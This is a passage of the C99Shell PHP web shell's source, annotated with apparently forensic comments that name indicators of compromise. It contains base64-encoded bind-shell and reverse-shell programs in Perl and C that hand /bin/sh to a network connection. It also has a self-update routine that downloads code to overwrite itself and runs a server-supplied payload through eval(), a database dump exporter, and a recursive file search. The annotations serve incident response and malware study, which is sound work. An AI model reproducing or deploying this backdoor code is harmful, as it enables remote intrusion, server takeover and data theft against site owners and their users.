"RUFNLCAwKTsNCnNldHNvY2tvcHQoUywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAxKTsNCmJp".

"bmQoUywgc29ja2FkZHJfaW4oJHBvcnQsIElOQUREUl9BTlkpKTsNCmxpc3RlbihTLCA1MCk7DQph".

"Y2NlcHQoWCxTKTsNCm9wZW4gU1RESU4sICI8JlgiOw0Kb3BlbiBTVERPVVQsICI+JlgiOw0Kb3Bl".

"biBTVERFUlIsICI+JlgiOw0KZXhlYygiZWNobyBcIldlbGNvbWUgdG8gYzk5c2hlbGwhXHJcblxy".

"XG5cIiIpOw0Kd2hpbGUoMSkNCnsNCiBhY2NlcHQoWCwgUyk7DQogdW5sZXNzKGZvcmspDQogew0K".

"ICBvcGVuIFNURElOLCAiPCZYIjsNCiAgb3BlbiBTVERPVVQsICI+JlgiOw0KICBjbG9zZSBYOw0K".

"ICBleGVjKCIvYmluL3NoIik7DQogfQ0KIGNsb3NlIFg7DQp9");}

 elseif ($fn == "c99sh_bindport.c") {return base64_decode(

"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5".

"cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4N".

"CiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50IGFyZ2M7DQpjaGFy".

"ICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1".

"Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5f".

"ZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9pKGFyZ3ZbMV0p".

"KTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tm".

"ZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigi".

"c29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikmcmVtb3Rl".

"LCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1h".

"Y2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsN".

"CiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk7DQogICBy".

"ZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1Zikp".

"DQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byBjOTlzaGVsbCAmJiAvYmluL2Jhc2ggLWkiKTsN".

"CiAgIGVsc2UNCiAgIGZwcmludGYoc3RkZXJyLCJTb3JyeSIpOw0KICAgY2xvc2UobmV3ZmQpOw0K".

"ICB9DQogfQ0KfQ0KaW50IGNocGFzcyhjaGFyICpiYXNlLCBjaGFyICplbnRlcmVkKSB7DQppbnQg".

"aTsNCmZvcihpPTA7aTxzdHJsZW4oZW50ZXJlZCk7aSsrKSANCnsNCmlmKGVudGVyZWRbaV0gPT0g".

"J1xuJykNCmVudGVyZWRbaV0gPSAnXDAnOyANCmlmKGVudGVyZWRbaV0gPT0gJ1xyJykNCmVudGVy".

"ZWRbaV0gPSAnXDAnOw0KfQ0KaWYgKCFzdHJjbXAoYmFzZSxlbnRlcmVkKSkNCnJldHVybiAwOw0K".

"fQ==");}

 elseif ($fn == "c99sh_backconn.pl") {return base64_decode(

"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ".

"HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ".

"DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ".

"HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L".

"CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd".

"GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka".

"WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO".

"iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR".

"VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK".

"FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==");}

 elseif ($fn == "c99sh_backconn.c") {return base64_decode(

"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5l".

"dGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZk".

"Ow0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBk".

"YWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0g".

"aHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihh".

"cmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsy".

"XSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsg".

"DQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1".

"Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0".

"KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIo".

"ZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwi".

"c2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==");}

 else {return false;}

}

}

if (!function_exists("c99sh_getupdate"))

{

/**
 * Self-update routine: asks the server in $GLOBALS["c99sh_updateurl"] what to do
 * and acts on a small binary reply (marker byte 0x99, a type byte, a length
 * byte, then a payload string).
 *
 * Reply types handled below: 0x01 error text, 0x02 "up to date", 0x03 new
 * version (optionally downloaded over this file), 0x04 payload passed to eval().
 *
 * Analyst notes:
 *  - The script makes outbound HTTP requests from the web server to the update
 *    host and to whatever URL that host returns; both show up in egress or proxy logs.
 *  - Type 0x03 overwrites this very file (__FILE__) with remote content, and type
 *    0x04 executes remote content, so the file on disk and its behaviour can
 *    change without a new upload. A changed hash or mtime is not evidence of a second intrusion.
 *  - The `$data{0}` curly-brace offset syntax was removed in PHP 8.0, where this
 *    file no longer parses.
 *
 * @param bool $update When true, a type-0x03 reply triggers the download-and-overwrite step.
 * @return mixed Status message string, or 1 after the eval branch.
 */
function c99sh_getupdate($update = true)

{

 // $updatenow is not declared global here, so inside this function it is unset and "0" is always sent.
 $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";

 $data = @file_get_contents($url);

 if (!$data) {return "Can't connect to update-server!";}

 else

 {

  $data = ltrim($data);

  // Payload starts at offset 3; its length is the value of the third byte.
  $string = substr($data,3,ord($data{2}));

  // (the second return on the next line can never be reached)
  if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return false;}

  if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}

  if ($data{0} == "\x99" and $data{1} == "\x03")

  {

   // Payload fields are separated by byte 0x01: [0] download URL, [1] version text.
   $string = explode("\x01",$string);

   if ($update)

   {

    $confvars = array();

    $sourceurl = $string[0];

    $source = file_get_contents($sourceurl);

    if (!$source) {return "Can't fetch update!";}

    else

    {

     // The downloaded content replaces this script in place; no signature or hash is checked.
     $fp = fopen(__FILE__,"w");

     if (!$fp) {return "Local error: can't write update to __FILE__! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}

     else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}

    }

   }

   else {return "New version are available: ".$string[1];}

  }

  // Type 0x04: the payload received from the update server is executed as PHP code.
  elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;}

  else {return "Error in protocol: segmentation failed! (".$data.") ";}

 }

}

}

if (!function_exists("mysql_dump"))

{

/**
 * Builds a plain-SQL dump (CREATE TABLE plus INSERT statements) of a MySQL
 * database through the legacy mysql_* extension, optionally writing it to a
 * file and/or echoing it.
 *
 * Options are read from $set: "sock", "db", "print", "nl2br", "file",
 * "add_drop", "tabs", "onlytabs".
 *
 * Incident-response notes:
 *  - When no "file" is given the dump is written to
 *    dump_<SERVER_NAME>_<db>_<dd-mm-YYYY-HH-ii-ss>.sql. $tmpdir is not declared
 *    global in this function, so it is unset here and the name is relative to
 *    the current working directory. Files matching that pattern in web-reachable
 *    directories suggest database contents were exported.
 *  - Every dump begins with the line "# Dumped by C99Shell.SQL v.", which can be
 *    searched for on disk and in captured responses.
 *
 * @param array $set Option array as described above.
 * @return string The generated SQL text.
 */
function mysql_dump($set)

{

 global $shver;

 $sock = $set["sock"];

 $db = $set["db"];

 $print = $set["print"];

 $nl2br = $set["nl2br"];

 $file = $set["file"];

 $add_drop = $set["add_drop"];

 $tabs = $set["tabs"];

 $onlytabs = $set["onlytabs"];

 $ret = array();

 $ret["err"] = array();

 // An invalid connection is only reported; execution continues regardless.
 if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}

 if (empty($db)) {$db = "db";}

 if (empty($print)) {$print = 0;}

 if (empty($nl2br)) {$nl2br = 0;}

 // empty(false) is true, so a caller cannot switch the DROP TABLE statements off.
 if (empty($add_drop)) {$add_drop = true;}

 if (empty($file))

 {

  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";

 }

 if (!is_array($tabs)) {$tabs = array();}

 if (empty($add_drop)) {$add_drop = true;}

 if (sizeof($tabs) == 0)

 {

  // retrieve the list of tables

  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);

  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}

 }

 $out = "# Dumped by C99Shell.SQL v. ".$shver."

# Home page: http://ccteam.ru

#

# Host settings:

# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."

# Date: ".date("d.m.Y H:i:s")."

# DB: \"".$db."\"

#---------------------------------------------------------

";

 // $c == 0 means "no table filter": every table in $tabs is dumped.
 $c = count($onlytabs);

 foreach($tabs as $tab)

 {

  if ((in_array($tab,$onlytabs)) or (!$c))

  {

   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}

   // fetch the statement that re-creates the table structure

   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);

   // mysql_smarterror() is declared with two parameters but called with none here.
   if (!$res) {$ret["err"][] = mysql_smarterror();}

   else

   {

    $row = mysql_fetch_row($res);

    $out .= $row["1"].";\n\n";

    // fetch every row of the table

    $res = mysql_query("SELECT * FROM `$tab`", $sock);

    if (mysql_num_rows($res) > 0)

    {

     while ($row = mysql_fetch_assoc($res))

     {

      $keys = implode("`, `", array_keys($row));

      $values = array_values($row);

      // Values are escaped with addslashes() only and all emitted as quoted strings.
      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}

      $values = implode("', '", $values);

      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";

      $out .= $sql;

     }

    }

   }

  }

 }

 $out .= "#---------------------------------------------------------------------------------\n\n";

 if ($file)

 {

  $fp = fopen($file, "w");

  // Error code 2 = dump file could not be opened; $ret is collected but never returned.
  if (!$fp) {$ret["err"][] = 2;}

  else

  {

   fwrite ($fp, $out);

   fclose ($fp);

  }

 }

 if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}

 return $out;

}

}

if (!function_exists("mysql_buildwhere"))
{
/**
 * Builds the condition part of a WHERE clause from a column=>value array.
 *
 * Each pair becomes `column` = 'value' with the value passed through
 * addslashes(); when $functs has a non-empty entry for the column the quoted
 * value is wrapped as FUNC('value'). Pairs are joined with $sep, which is
 * appended without a trailing space. Column and function names are inserted
 * verbatim, and a non-array $array is treated as empty.
 */
function mysql_buildwhere($array,$sep=" and",$functs=array())
{
 if (!is_array($array)) {$array = array();}

 $clause = "";
 foreach ($array as $column=>$raw)
 {
  $quoted = "'".addslashes($raw)."'";
  if (!empty($functs[$column])) {$quoted = $functs[$column]."(".$quoted.")";}
  $clause .= "`".$column."` = ".$quoted.$sep;
 }
 // Drop the separator that follows the last pair.
 return substr($clause,0,strlen($clause)-strlen($sep));
}
}

if (!function_exists("mysql_fetch_all"))
{
/**
 * Runs $query through the legacy mysql_* extension and returns all rows.
 *
 * Uses the given connection when $sock is truthy, otherwise the default one.
 * Rows come from mysql_fetch_array(); the result set is freed before returning.
 */
function mysql_fetch_all($query,$sock)
{
 $result = $sock ? mysql_query($query,$sock) : mysql_query($query);

 $rows = array();
 while ($row = mysql_fetch_array($result)) {$rows[] = $row;}
 mysql_free_result($result);
 return $rows;
}
}

if (!function_exists("mysql_smarterror"))
{
/**
 * Returns the last MySQL error message, HTML-escaped for display.
 *
 * $type is accepted but not used. The error is read from $sock when it is
 * truthy, otherwise from the default connection.
 */
function mysql_smarterror($type,$sock)
{
 $message = $sock ? mysql_error($sock) : mysql_error();
 return htmlspecialchars($message);
}
}

if (!function_exists("mysql_query_form"))

{

/**
 * Prints the SQL query / confirmation form of the built-in SQL manager.
 *
 * All state comes from the globals listed below. $sql_goto, $sql_surl, $sql_tbl
 * and $sql_last_query are used but not declared global, so inside this
 * function they are unset.
 *
 * Signature note: the form name "c99sh_sqlquery" and the hidden field names
 * (sql_act, sql_tbl, sql_goto, sql_confirm) are fixed strings in the HTML this
 * emits and in the POST bodies it produces.
 */
function mysql_query_form()

{

 global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;

 // A submitted, confirmed query that produced no result is reported as an error.
 if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}

 if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}

 if ((!$submit) or ($sql_act))

 {

  // The query text and hidden values are HTML-escaped before being echoed back into the form.
  echo "<table border=0><tr><td><form action=\"".$sql_surl."\" name=\"c99sh_sqlquery\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=\"sql_act\" value=\"query\"><input type=hidden name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";

  if ($tbl_struct)

  {

   echo "<td valign=\"top\"><b>Fields:</b><br>";

   // Field names are written into the page without escaping; clicking one appends it to the query box.
   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}

   echo "</td></tr></table>";

  }

 }

 if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}

}

}

if (!function_exists("mysql_create_db"))
{
/**
 * Issues CREATE DATABASE for $db through the legacy mysql_* extension.
 *
 * The name is passed through addslashes() and wrapped in backticks. The query
 * runs on $sock when it is truthy, otherwise on the default connection, and
 * the mysql_query() result is returned.
 */
function mysql_create_db($db,$sock="")
{
 $statement = "CREATE DATABASE `".addslashes($db)."`;";
 if (!$sock) {return mysql_query($statement);}
 return mysql_query($statement,$sock);
}
}

if (!function_exists("mysql_query_parse"))
{
/**
 * Classifies an SQL statement by its first keyword.
 *
 * Known keywords map to an output-type list:
 *   0 = no output, 1 = output only on error,
 *   2 = output without control buttons, 3 = output with control buttons.
 *
 * As written, the function returns false for an unknown keyword and nothing
 * (null) for a known one: the $result array it fills is never returned, and the
 * LIMIT-parsing branch compares an array with 2, so it does not run.
 */
function mysql_query_parse($query)
{
 $query = trim($query);
 $words = explode(" ",$query);
 $types = array(
  "SELECT"=>array(3,1),
  "SHOW"=>array(2,1),
  "DELETE"=>array(1),
  "DROP"=>array(1)
 );
 $keyword = strtoupper($words[0]);

 if (!is_array($types[$keyword])) {return false;}

 $result = array();
 $result["propertions"] = $types[$keyword];
 $result["query"] = $query;
 if ($types[$keyword] == 2)
 {
  foreach ($words as $pos=>$word)
  {
   if (strtoupper($word) != "LIMIT") {continue;}
   // Normalise "LIMIT n" to array(0,n) and "LIMIT a,b" to array(a,b).
   $result["limit"] = explode(",",$words[$pos+1]);
   if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
   unset($words[$pos],$words[$pos+1]);
  }
 }
}
}

if (!function_exists("c99fsearch"))

{

/**
 * Recursively searches directory $d for entries by name and, optionally, by content.
 *
 * Search options come from the global array $a ("name", "name_regexp", "text",
 * "text_regexp", "text_wwo", "text_cs", "text_not"); matches are appended to
 * the global $found, and the globals $found_d/$found_f and
 * $search_i_d/$search_i_f count matches and visited entries.
 *
 * Host-level note: a content search reads every name-matching file in full via
 * file_get_contents(), so a large burst of file reads by the web-server account
 * across a directory tree is the footprint this leaves. ereg() was removed in
 * PHP 7.0, so the regexp options only work on older runtimes.
 */
function c99fsearch($d)

{

 global $found;

 global $found_d;

 global $found_f;

 global $search_i_f;

 global $search_i_d;

 global $a;

 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}

 $h = opendir($d);

 while (($f = readdir($h)) !== false)

 {

  if($f != "." && $f != "..")

  {

   // Name match: substring test by default, ereg() pattern when "name_regexp" is set.
   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== false) || ($a["name_regexp"] and ereg($a["name"],$f));

   if (is_dir($d.$f))

   {

    $search_i_d++;

    // Directories count as hits only for name-only searches.
    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}

    // Symbolic links to directories are not followed.
    if (!is_link($d.$f)) {c99fsearch($d.$f);}

   }

   else

   {

    $search_i_f++;

    if ($bool)

    {

     if (!empty($a["text"]))

     {

      $r = @file_get_contents($d.$f);

      // These two lines rewrite the shared $a["text"] on every matching file, not just once.
      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}

      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}

      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}

      // A space is prepended and the search starts at offset 1, so a hit is never position 0 (falsy).
      else {$bool = strpos(" ".$r,$a["text"],1);}

      // "text_not" inverts the content match.
      if ($a["text_not"]) {$bool = !$bool;}

      if ($bool) {$found[] = $d.$f; $found_f++;}

     }

     else {$found[] = $d.$f; $found_f++;}

    }

   }

  }

 }

 closedir($h);

}

}

// "gofile" is resolved into a concrete action: a directory becomes a listing ("ls" with $d set to it),
// anything else becomes a file view ("f") with $d/$f split into directory and base name.
if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}

// Output is buffered from here on, with implicit flushing switched off.

@ob_start();

@ob_implicit_flush(0);

function onphpshutdown()

{

 global $gzipencode,$ft;

 if (!headers_sent() and $gzipencode and !in_array($ft,array(&qu